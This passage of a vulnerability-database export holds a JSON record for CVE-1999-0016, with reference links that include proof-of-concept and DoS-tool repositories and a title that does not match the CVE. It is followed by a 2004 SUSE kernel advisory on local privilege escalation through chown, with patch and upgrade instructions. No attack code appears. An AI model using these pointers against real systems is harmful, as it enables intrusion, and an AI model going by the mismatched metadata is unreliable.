        "trust": 0.1,
        "url": "https://github.com/ascendantlogic/opensims "
      },
      {
        "title": "CVE-1999-0016-POC",
        "trust": 0.1,
        "url": "https://github.com/pommaq/cve-1999-0016-poc "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-1999-0016"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-1999-0016"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.9,
        "url": "http://www.microsoft.com/technet/security/bulletin/ms05-019.mspx"
      },
      {
        "trust": 1.8,
        "url": "http://www1.itrc.hp.com/service/cki/docdisplay.do?docid=hpsbux9801-076"
      },
      {
        "trust": 1.6,
        "url": "about vulnerability notes"
      },
      {
        "trust": 1.6,
        "url": "contact us about this vulnerability"
      },
      {
        "trust": 1.6,
        "url": "provide a vendor statement"
      },
      {
        "trust": 0.9,
        "url": "http://secunia.com/advisories/14512/"
      },
      {
        "trust": 0.9,
        "url": "http://xforce.iss.net/xforce/alerts/id/193"
      },
      {
        "trust": 0.9,
        "url": "http://www.microsoft.com/technet/security/bulletin/ms05-021.mspx"
      },
      {
        "trust": 0.9,
        "url": "http://secunia.com/advisories/14920/"
      },
      {
        "trust": 0.8,
        "url": "http://www.microsoft.com/technet/security/bulletin/ms05-020.mspx"
      },
      {
        "trust": 0.8,
        "url": "http://www.idefense.com/application/poi/display?id=228\u0026type=vulnerabilities"
      },
      {
        "trust": 0.8,
        "url": "http://www.microsoft.com/security/bulletins/200504_msnmessenger.mspx"
      },
      {
        "trust": 0.8,
        "url": "http://www.microsoft.com/technet/security/bulletin/ms05-022.mspx"
      },
      {
        "trust": 0.8,
        "url": "http://support.microsoft.com/kb/889829"
      },
      {
        "trust": 0.8,
        "url": "http://support.microsoft.com/kb/896597"
      },
      {
        "trust": 0.8,
        "url": "http://messenger.msn.com"
      },
      {
        "trust": 0.8,
        "url": "http://www.w3.org/graphics/gif/spec-gif89a.txt"
      },
      {
        "trust": 0.8,
        "url": "http://secunia.com/advisories/14512"
      },
      {
        "trust": 0.8,
        "url": "http://www.securityfocus.com/bid/2666 "
      },
      {
        "trust": 0.8,
        "url": "http://xforce.iss.net/xforce/xfdb/19593"
      },
      {
        "trust": 0.8,
        "url": "http://osvdb.org/displayvuln.php?osvdb_id=14578"
      },
      {
        "trust": 0.8,
        "url": "http://xforce.iss.net/xforce/alerts/id/192"
      },
      {
        "trust": 0.8,
        "url": "http://www.iana.org/assignments/ip-parameters"
      },
      {
        "trust": 0.8,
        "url": "http://www.securityfocus.com/bid/13116/"
      },
      {
        "trust": 0.8,
        "url": "http://securitytracker.com/alerts/2005/apr/1013686.html"
      },
      {
        "trust": 0.8,
        "url": "http://www.us-cert.gov/cas/techalerts/ta05-102a.html"
      },
      {
        "trust": 0.8,
        "url": "http://www.osvdb.org/displayvuln.php?osvdb_id=15467"
      },
      {
        "trust": 0.3,
        "url": "http://support.microsoft.com/support/kb/articles/q165/0/05.asp"
      },
      {
        "trust": 0.3,
        "url": "http://support.microsoft.com/support/kb/articles/q177/5/39.asp"
      },
      {
        "trust": 0.3,
        "url": "http://support.novell.com/cgi-bin/search/tidfinder.cgi?2932511"
      },
      {
        "trust": 0.3,
        "url": "http://www.cisco.com/warp/public/770/land-pub.shtml#iosvers"
      },
      {
        "trust": 0.3,
        "url": "http://www.securityfocus.com/archive/1/392354"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/392642"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/393045"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/392354"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/secunia_security_advisories/"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/about_secunia_advisories/"
      },
      {
        "trust": 0.1,
        "url": ""
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/.html"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/pexmee/cve-1999-0016-land-dos-tool"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/ascendantlogic/opensims"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://www.exploit-db.com/exploits/20812/"
      },
      {
        "trust": 0.1,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=8889"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/1173/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/22/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/1174/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/1176/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/1175/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/16/"
      },
      {
        "trust": 0.1,
        "url": "https://ca.secunia.com/?f=l"
      },
      {
        "trust": 0.1,
        "url": "http://www.microsoft.com/downloads/details.aspx?familyid=35bce74a-e84a-4035-bf18-196368f032cc"
      },
      {
        "trust": 0.1,
        "url": "http://www.microsoft.com/downloads/details.aspx?familyid=2a2af17e-2e4a-4479-8ac9-b5544ea0bd66"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/secunia_vacancies/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/41/"
      },
      {
        "trust": 0.1,
        "url": "http://www.microsoft.com/downloads/details.aspx?familyid=97f409eb-c8d0-4c94-a67b-5945e26c9267"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/1828/"
      },
      {
        "trust": 0.1,
        "url": "http://www.kb.cert.org/vuls/id/633446\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.kb.cert.org/vuls/id/222050\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.kb.cert.org/vuls/id/233754\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.kb.cert.org/vuls/id/275193\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.microsoft.com/technet/security/bulletin/ms05-apr.mspx\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.kb.cert.org/vuls/id/774338\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.us-cert.gov/cas/techalerts/ta05-102a.html\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.us-cert.gov/legal.html\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.kb.cert.org/vuls/id/756122\u003e"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#774338"
      },
      {
        "db": "CERT/CC",
        "id": "VU#756122"
      },
      {
        "db": "CERT/CC",
        "id": "VU#222050"
      },
      {
        "db": "CERT/CC",
        "id": "VU#633446"
      },
      {
        "db": "CERT/CC",
        "id": "VU#396645"
      },
      {
        "db": "CERT/CC",
        "id": "VU#233754"
      },
      {
        "db": "CERT/CC",
        "id": "VU#275193"
      },
      {
        "db": "VULHUB",
        "id": "VHN-16"
      },
      {
        "db": "VULMON",
        "id": "CVE-1999-0016"
      },
      {
        "db": "BID",
        "id": "2666"
      },
      {
        "db": "PACKETSTORM",
        "id": "36523"
      },
      {
        "db": "PACKETSTORM",
        "id": "37141"
      },
      {
        "db": "PACKETSTORM",
        "id": "37198"
      },
      {
        "db": "NVD",
        "id": "CVE-1999-0016"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-199712-002"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#774338"
      },
      {
        "db": "CERT/CC",
        "id": "VU#756122"
      },
      {
        "db": "CERT/CC",
        "id": "VU#222050"
      },
      {
        "db": "CERT/CC",
        "id": "VU#633446"
      },
      {
        "db": "CERT/CC",
        "id": "VU#396645"
      },
      {
        "db": "CERT/CC",
        "id": "VU#233754"
      },
      {
        "db": "CERT/CC",
        "id": "VU#275193"
      },
      {
        "db": "VULHUB",
        "id": "VHN-16"
      },
      {
        "db": "VULMON",
        "id": "CVE-1999-0016"
      },
      {
        "db": "BID",
        "id": "2666"
      },
      {
        "db": "PACKETSTORM",
        "id": "36523"
      },
      {
        "db": "PACKETSTORM",
        "id": "37141"
      },
      {
        "db": "PACKETSTORM",
        "id": "37198"
      },
      {
        "db": "NVD",
        "id": "CVE-1999-0016"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-199712-002"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2005-04-12T00:00:00",
        "db": "CERT/CC",
        "id": "VU#774338"
      },
      {
        "date": "2005-04-12T00:00:00",
        "db": "CERT/CC",
        "id": "VU#756122"
      },
      {
        "date": "2005-04-12T00:00:00",
        "db": "CERT/CC",
        "id": "VU#222050"
      },
      {
        "date": "2005-04-12T00:00:00",
        "db": "CERT/CC",
        "id": "VU#633446"
      },
      {
        "date": "2005-04-13T00:00:00",
        "db": "CERT/CC",
        "id": "VU#396645"
      },
      {
        "date": "2005-04-12T00:00:00",
        "db": "CERT/CC",
        "id": "VU#233754"
      },
      {
        "date": "2005-04-12T00:00:00",
        "db": "CERT/CC",
        "id": "VU#275193"
      },
      {
        "date": "1997-12-01T00:00:00",
        "db": "VULHUB",
        "id": "VHN-16"
      },
      {
        "date": "1997-12-01T00:00:00",
        "db": "VULMON",
        "id": "CVE-1999-0016"
      },
      {
        "date": "1997-11-20T00:00:00",
        "db": "BID",
        "id": "2666"
      },
      {
        "date": "2005-03-15T04:45:15",
        "db": "PACKETSTORM",
        "id": "36523"
      },
      {
        "date": "2005-04-18T07:20:47",
        "db": "PACKETSTORM",
        "id": "37141"
      },
      {
        "date": "2005-04-19T06:59:49",
        "db": "PACKETSTORM",
        "id": "37198"
      },
      {
        "date": "1997-12-01T05:00:00",
        "db": "NVD",
        "id": "CVE-1999-0016"
      },
      {
        "date": "1997-11-13T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-199712-002"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2005-08-18T00:00:00",
        "db": "CERT/CC",
        "id": "VU#774338"
      },
      {
        "date": "2005-04-13T00:00:00",
        "db": "CERT/CC",
        "id": "VU#756122"
      },
      {
        "date": "2005-04-13T00:00:00",
        "db": "CERT/CC",
        "id": "VU#222050"
      },
      {
        "date": "2005-04-12T00:00:00",
        "db": "CERT/CC",
        "id": "VU#633446"
      },
      {
        "date": "2005-04-13T00:00:00",
        "db": "CERT/CC",
        "id": "VU#396645"
      },
      {
        "date": "2005-05-03T00:00:00",
        "db": "CERT/CC",
        "id": "VU#233754"
      },
      {
        "date": "2005-08-02T00:00:00",
        "db": "CERT/CC",
        "id": "VU#275193"
      },
      {
        "date": "2008-09-09T00:00:00",
        "db": "VULHUB",
        "id": "VHN-16"
      },
      {
        "date": "2008-09-09T00:00:00",
        "db": "VULMON",
        "id": "CVE-1999-0016"
      },
      {
        "date": "2009-07-11T06:06:00",
        "db": "BID",
        "id": "2666"
      },
      {
        "date": "2008-09-09T12:33:32.243000",
        "db": "NVD",
        "id": "CVE-1999-0016"
      },
      {
        "date": "2006-11-16T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-199712-002"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "37198"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-199712-002"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Microsoft Internet Explorer DHTML objects contain a race condition",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#774338"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "unknown",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-199712-002"
      }
    ],
    "trust": 0.6
  }
}

var-200412-0085
Vulnerability from variot

Unknown vulnerability in Linux kernel 2.x may allow local users to modify the group ID of files, such as NFS exported files in kernel 2.4. Linux Kernel of NFS The server inode_change_ok() Due to incomplete file owner check in the function, NFS If you are exporting for client mounting, NFS Files that cannot be changed by the client GID There is a vulnerability that can be modified illegally.file of GID May be altered illegally. For the Linux kernel 2.4.X this issue is only exploitable when the kernel NFS server is active, for the 2.6.X kernel this issue is always exploitable. An attacker may reportedly be able to exploit this issue to gain superuser privileges. This issue was reported in version 2.6.6, but other versions, including 2.4.X, are also likely vulnerable. Red Hat Enterprise Linux includes the 2.4 kernel. -----BEGIN PGP SIGNED MESSAGE-----


                    SUSE Security Announcement

    Package:                kernel
    Announcement-ID:        SUSE-SA:2004:020
    Date:                   Tuesday, Jul 2nd 2004 18:00 MEST
    Affected products:      8.0, 8.1, 8.2, 9.0, 9.1
                            SUSE Linux Database Server,
                            SUSE eMail Server III, 3.1
                            SUSE Linux Enterprise Server 7, 8
                            SUSE Linux Firewall on CD/Admin host
                            SUSE Linux Connectivity Server
                            SUSE Linux Office Server
    Vulnerability Type:     local privilege escalation
    Severity (1-10):        6
    SUSE default package:   yes
    Cross References:   CAN-2004-0495
            CAN-2004-0496
            CAN-2004-0497
            CAN-2004-0535
            CAN-2004-0626


Content of this advisory:
    1) security vulnerability resolved:
    - chown: users can change the group affiliation of arbitrary
      files to the group they belong to
    - missing DAC check in chown(2): local privilege escalation
        - overflow with signals: local denial-of-service
        - pss, mpu401 sound driver: read/write to complete memory
        - airo driver: read/write to complete memory
        - ALSA: copy_from_user/copy_to_user confused
        - acpi_asus: read from random memory
        - decnet: write to memory without checking
        - e1000 driver: read complete memory
       problem description, discussion, solution and upgrade information
    2) pending vulnerabilities, solutions, workarounds:
    - icecast
            - sitecopy
            - cadaver
            - OpenOffice_org
            - tripwire
            - postgresql*
            - mod_proxy
    - freeswan
    - ipsec-tools
    - less
    - libpng
    - pavuk
    - XFree86*
    - kdebase3
    3) standard appendix (further information)

1) problem description, brief discussion, solution, upgrade information

Multiple security vulnerabilities are being addressed with this security
update of the Linux kernel.

Kernel memory access vulnerabilities are fixed in the e1000, decnet, 
acpi_asus, alsa, airo/WLAN, pss and mpu401 drivers. These 
vulnerabilities can lead to kernel memory read access, write access 
and local denial of service conditions, resulting in access to the 
root account for an attacker with a local account on the affected 
system.

Missing Discretionary Access Control (DAC) checks in the chown(2) system
call allow an attacker with a local account to change the group
ownership of arbitrary files, which leads to root privileges on affected
systems. It is specific to kernel version 2.6 based systems such as 
the SUSE Linux 9.1 product, that only local shell access is needed to 
exploit this vulnerability. An interesting variant of the missing 
checks is that the ownership of files in the /proc filesystem can be 
altered, while the changed ownership still does not allow the files to 
be accessed as a non-root user for to be able to exploit the 
vulnerability. If the knfsd NFS 
server is not activated (it is off by default), the vulnerability is 
not exposed. These issues related to the chown(2) system call have been 
discovered by Michael Schroeder and Ruediger Oertel, both SUSE LINUX.

The only network-related vulnerability fixed with the kernel updates
that are subject to this announcement affect the SUSE Linux 9.1 
distribution only, as it is based on a 2.6 kernel. Found and reported 
to bugtraq by Adam Osuchowski and Tomasz Dubinski, the vulnerability 
allows a remote attacker to send a specially crafted TCP packet to a 
vulnerable system, causing that system to stall if it makes use of 
TCP option matching netfilter rules.

In some rare configurations of the SUSE Linux 9.1 distribution, some 
users have experienced stalling systems during system startup. These 
problems are fixed with this kernel update.



SPECIAL INSTALL INSTRUCTIONS:
==============================
For the impatient: Run YOU (Yast2 Online Update, command 
"yast2 online_update" as root) to install the updates (semi) 
automatically, if you have a SUSE Linux 8.1 and newer system.

For those who wish to install their kernel updates manually and for 
those who use a SUSE Linux 8.0 system:

The following paragraphs will guide you through the installation
process in a step-by-step fashion. The character sequence "****"
marks the beginning of a new paragraph. In some cases, the steps
outlined in a particular paragraph may or may not be applicable
to your situation. 
Therefore, please make sure to read through all of the steps below
before attempting any of these procedures. 
All of the commands that need to be executed are required to be
run as the superuser (root). Each step relies on the steps before
it to complete successfully.

**** Step 1: Determine the needed kernel type

Please use the following command to find the kernel type that is
installed on your system:

  rpm -qf /boot/vmlinuz

Following are the possible kernel types (disregard the version and
build number following the name separated by the "-" character)

  k_deflt   # default kernel, good for most systems. 
  k_i386    # kernel for older processors and chipsets
  k_athlon  # kernel made specifically for AMD Athlon(tm) family processors
  k_psmp    # kernel for Pentium-I dual processor systems
  k_smp     # kernel for SMP systems (Pentium-II and above)
  k_smp4G   # kernel for SMP systems which supports a maximum of 4G of RAM
  kernel-64k-pagesize
  kernel-bigsmp
  kernel-default
  kernel-smp

**** Step 2: Download the package for your system

Please download the kernel RPM package for your distribution with the
name as indicated by Step 1. The list of all kernel rpm packages is
appended below. Note: The kernel-source package does not
contain a binary kernel in bootable form. Instead, it contains the
sources that the binary kernel rpm packages are created from. It can be
used by administrators who have decided to build their own kernel. 
Since the kernel-source.rpm is an installable (compiled) package that
contains sources for the linux kernel, it is not the source RPM for
the kernel RPM binary packages.

The kernel RPM binary packages for the distributions can be found at the
locations below ftp://ftp.suse.com/pub/suse/i386/update/.

  8.0/images/
  8.1/rpm/i586
  8.2/rpm/i586
  9.0/rpm/i586
  9.1/rpm/i586

After downloading the kernel RPM package for your system, you should
verify the authenticity of the kernel rpm package using the methods as
listed in section 3) of each SUSE Security Announcement.

**** Step 3: Installing your kernel rpm package

Install the rpm package that you have downloaded in Steps 3 or 4 with
the command
    rpm -Uhv --nodeps --force <K_FILE.RPM>
where <K_FILE.RPM> is the name of the rpm package that you downloaded.

Warning: After performing this step, your system will likely not be
         able to boot if the following steps have not been fully
         followed.


If you run SUSE LINUX 8.1 and haven't applied the kernel update
(SUSE-SA:2003:034), AND you are using the freeswan package, you also
need to update the freeswan rpm as a dependency as offered
by YOU (YaST Online Update). The package can be downloaded from
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/

**** Step 4: configuring and creating the initrd

The initrd is a ramdisk that is loaded into the memory of your
system together with the kernel boot image by the bootloader. The
kernel uses the content of this ramdisk to execute commands that must
be run before the kernel can mount its actual root filesystem. It is
usually used to initialize SCSI drivers or NIC drivers for diskless
operation.

The variable INITRD_MODULES in /etc/sysconfig/kernel determines
which kernel modules will be loaded in the initrd before the kernel
has mounted its actual root filesystem. The variable should contain
your SCSI adapter (if any) or filesystem driver modules.

With the installation of the new kernel, the initrd has to be
re-packed with the update kernel modules. Please run the command

  mk_initrd

as root to create a new init ramdisk (initrd) for your system. 
On SuSE Linux 8.1 and later, this is done automatically when the
RPM is installed.

**** Step 5: bootloader

If you run a SUSE LINUX 8.x, SLES8, or SUSE LINUX 9.x system, there
are two options:
Depending on your software configuration, you have either the lilo
bootloader or the grub bootloader installed and initialized on your
system. 
The grub bootloader does not require any further actions to be
performed after the new kernel images have been moved in place by the
rpm Update command. 
If you have a lilo bootloader installed and initialized, then the lilo
program must be run as root. Use the command

  grep LOADER_TYPE /etc/sysconfig/bootloader

to find out which boot loader is configured. If it is lilo, then you
must run the lilo command as root. If grub is listed, then your system
does not require any bootloader initialization.

Warning: An improperly installed bootloader may render your system
         unbootable.

**** Step 6: reboot

If all of the steps above have been successfully completed on your
system, then the new kernel including the kernel modules and the
initrd should be ready to boot. The system needs to be rebooted for
the changes to become active. Please make sure that all steps have
completed, then reboot using the command
    shutdown -r now
or
    init 6

Your system should now shut down and reboot with the new kernel.


There is no workaround known.


Please download the update package for your distribution and verify its
integrity by the methods listed in section 3) of this announcement. 
Then, install the package using the command "rpm -Fhv file.rpm" to apply
the update. 
Our maintenance customers are being notified individually. The packages
are being offered to install from the maintenance web.





x86 Platform:

SUSE Linux 9.1:
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-default-2.6.5-7.95.i586.rpm
  800418d3dddf6d3b83925f562842205a
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-smp-2.6.5-7.95.i586.rpm
  0cb990b159e10685bb29b76d312ddd25
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-bigsmp-2.6.5-7.95.i586.rpm
  7446bb70f52bce57a914066be4ed8e45
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-bigsmp-2.6.5-7.95.i586.rpm
  7446bb70f52bce57a914066be4ed8e45
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-source-2.6.5-7.95.i586.rpm
  ede031495ee19d8b6eca1873e7155332
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-default-2.6.5-7.95.nosrc.rpm
  620ef40226fec31a773397cf3051bf36
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-smp-2.6.5-7.95.nosrc.rpm
  9b61b5a70b304f5554cb18a6bae5b5fd
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-bigsmp-2.6.5-7.95.nosrc.rpm
  227c85280ee17a66c8590fe1bb14c596
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-source-2.6.5-7.95.src.rpm
  895fee3033de0810ff1173ce8ee87936

SUSE Linux 9.0:
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_deflt-2.4.21-231.i586.rpm
  48be395b96329909486ae3a5152348fa
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_athlon-2.4.21-231.i586.rpm
  4cd322b4f511d5fe4c483ed28a82097e
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_smp-2.4.21-231.i586.rpm
  262e33cebf1b0d35fb6d3235c9ab8815
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_smp4G-2.4.21-231.i586.rpm
  8d81370f90736b12aa71b9c744f6e0e2
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_um-2.4.21-231.i586.rpm
  bc59c838c84ba318dc4d24da08a3022e
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/kernel-source-2.4.21-231.i586.rpm
  f9586ba982e0398c3e48871955b661aa
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_deflt-2.4.21-231.src.rpm
  18673b0bf347fe9557d4e67ca02000c0
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_athlon-2.4.21-231.src.rpm
  71496daac44196b0e0a3836ee6a3b4ed
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_smp-2.4.21-231.src.rpm
  7c208e9e3f7be1a68c3c8457eb2cafc4
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_smp4G-2.4.21-231.src.rpm
  b77863c863aaf4b931bff263220e6ec9
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_um-2.4.21-231.src.rpm
  bed7e964e22c5e5d2f5e7a5e3816dde4
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/kernel-source-2.4.21-231.src.rpm
  6b5137bf379fbfc861441151039575da

SUSE Linux 8.2:
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_deflt-2.4.20-115.i586.rpm
  50d261b44616f9145a0dc16df501a504
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_athlon-2.4.20-115.i586.rpm
  10095854c0bdae20991d90b822352e14
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_smp-2.4.20-115.i586.rpm
  a2ef7cfb0e62ad955dda2b0574eb3150
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_psmp-2.4.20-115.i586.rpm
  1d2b0d0e2c7998685ed04c24e593b196
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/kernel-source-2.4.20.SuSE-115.i586.rpm
  d8bf98c46ba5313db286d5706f7fb3b8
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_deflt-2.4.20-115.src.rpm
  e13a7b4c2b185cfeb991c31607f79ccb
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_athlon-2.4.20-115.src.rpm
  0e2f2cf20e7d7a20f3e50b245105df61
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_smp-2.4.20-115.src.rpm
  6cfac2914d3827ec562ff9d6be29c566
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_psmp-2.4.20-115.src.rpm
  afd29843aa69d805ef5f25d39ecd0e7f
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/kernel-source-2.4.20.SuSE-115.src.rpm
  098a1400a48404931acb8b3eb2e821fb

SUSE Linux 8.1:
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_deflt-2.4.21-231.i586.rpm
  3bdaa593d09a7cbff632a2c4446d5603
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_athlon-2.4.21-231.i586.rpm
  ba60d0b2b6d3bc9c38b4e8b3859e1586
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_smp-2.4.21-231.i586.rpm
  ffa8983669004826a0cbedbe34dced76
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_psmp-2.4.21-231.i586.rpm
  25174fd007f5a39ee0342dd6f18f2eaa
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/kernel-source-2.4.21-231.i586.rpm
  10837fa561cd5104e55d48e46c837764
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_deflt-2.4.21-231.src.rpm
  c37e8b87819602e77b14206affef00fa
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_athlon-2.4.21-231.src.rpm
  7be68a677db5a65be1a46ec194b35497
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_smp-2.4.21-231.src.rpm
  8e4b7d5a6bb81da5a00971cdcc4ec641
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_psmp-2.4.21-231.src.rpm
  d8ba1db81a9b517f867c970e4fc443a7
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/kernel-source-2.4.21-231.src.rpm
  96a0a9242d066083c7bff8e0f70b7bbe

SUSE Linux 8.0:
ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_deflt-2.4.18-303.i386.rpm
  ec1e53b3812c0c0bd3681435d69fb134
ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_smp-2.4.18-303.i386.rpm
  583164e52019ae090fd47e425c2a933e
ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_psmp-2.4.18-303.i386.rpm
  9ac8983abef05697d75f3117e37e5f18
ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_i386-2.4.18-303.i386.rpm
  4932c4d6a42fc9be02013f398ab5bb96
ftp://ftp.suse.com/pub/suse/i386/update/8.0/d3/kernel-source-2.4.18.SuSE-303.i386.rpm
  b9de0731f9bbc4b016455a6d52cd8296
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_deflt-2.4.18-303.src.rpm
  a73bacad80432c26e856c41338b154bd
ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_smp-2.4.18-303.src.rpm
  782902cd14e7776db66bd61a12beee03
ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_psmp-2.4.18-303.src.rpm
  d71fa5cda488ae18f8d023cd8f28bb73
ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_i386-2.4.18-303.src.rpm
  a360a9e6ed2db54f69e17db36f02614f
ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/kernel-source-2.4.18.SuSE-303.nosrc.rpm
  8017fd6ff8a6fc1a0660ab35ad174388



x86-64 Platform:

SUSE Linux 9.1:
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-default-2.6.5-7.95.x86_64.rpm
  e2c53fd24991f739fd754c07f7aa8293
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-smp-2.6.5-7.95.x86_64.rpm
  f4a69622b7628cdd662a4e39aa59b60e
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-source-2.6.5-7.95.x86_64.rpm
  e71adfb1fc662600eb11d3acf67c3dc3
source rpm(s):
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-default-2.6.5-7.95.nosrc.rpm
  f6a364879d1f2ae2cf854810d61be3ac
